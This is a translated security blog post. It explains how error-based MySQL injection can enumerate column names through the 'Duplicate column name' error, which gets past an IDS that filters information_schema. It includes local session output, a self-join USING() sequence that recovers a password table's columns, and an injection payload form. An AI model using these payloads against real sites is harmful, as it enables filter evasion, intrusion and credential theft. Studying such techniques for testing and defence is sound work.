Bypassing an IDS that filters information_schema to continue the injection
Source: http://key0.cn/index.php/archives/510
Written by mickey; the original text follows:
Back when I was doing penetration tests I ran into a site where the IDS filtered information_schema, and as a result I never managed to finish it. The day before yesterday I read an article and found a way to bypass this. I tested it locally and also discussed it with 月牛, and with 月牛's help all the statements were constructed. When I went back to that original injection point, it worked as well. Later 当哥 released the method, so I'll publish it here.
1. Build test tables locally
mysql> create table users(id int,name varchar(20),passwd varchar(32));
Query OK, 0 rows affected (0.04 sec)
mysql> insert into users value(1,'mickey','827ccb0eea8a706c4c34a16891f84e7b');
Query OK, 1 row affected (0.00 sec)
mysql> create table news(is_admin int(1),id int(2),title varchar(100),date date);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into news values(1,1,'hello,mickey',now());
Query OK, 1 row affected, 1 warning (0.00 sec)
2. Dumping column names
mysql> select * from (select * from users as a join news as b) as c;
ERROR 1060 (42S21): Duplicate column name 'id'
MySQL refuses to build the derived table c because both users and news contain a column called id, and the error message itself leaks that column name. Nothing in the statement touches information_schema, so a filter on that keyword does not fire.
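Joining users against a second table only reveals the columns the two tables share. The following is an added example, not part of mickey's original post, that extends the same error-based trick into a self-join of users so that every column of that table is recovered in order. It assumes the users table created in step 1 above and an injection point that echoes MySQL error messages back to the attacker.

```sql
-- Added example (not from the original post): enumerate every column of
-- `users` through the Duplicate-column-name error, without information_schema.
-- Assumes the `users` table built in step 1 exists in the current database.

-- A self-join collides on every column of `users`, so each statement below
-- reveals the next column name in the error message.

-- Step 1: no USING clause; every column collides and MySQL names the first one.
SELECT * FROM (SELECT * FROM users a JOIN users b) c;
-- ERROR 1060 (42S21): Duplicate column name 'id'

-- Step 2: coalesce the column already known via USING(); the next duplicate
-- surfaces.
SELECT * FROM (SELECT * FROM users a JOIN users b USING (id)) c;
-- ERROR 1060 (42S21): Duplicate column name 'name'

-- Step 3: keep appending the known columns to USING().
SELECT * FROM (SELECT * FROM users a JOIN users b USING (id, name)) c;
-- ERROR 1060 (42S21): Duplicate column name 'passwd'

-- Step 4: once all columns are listed the query succeeds; that success is the
-- signal that the enumeration is complete (the rows it returns do not matter).
SELECT * FROM (SELECT * FROM users a JOIN users b USING (id, name, passwd)) c;

-- With the column names known, the data is read directly, again without
-- information_schema.
SELECT id, name, passwd FROM users;
```

Inside an injection the derived table is simply placed where the DBMS error reaches the page, for example appended as AND (SELECT * FROM (SELECT * FROM users a JOIN users b) c); the duplicate-column check fails during statement preparation, so the error text is produced before anything is evaluated. Two caveats apply: the table name must already be known or guessed, since this trick enumerates columns only, and the target has to surface MySQL error messages; on a site that suppresses them the same column leakage is not available through this route.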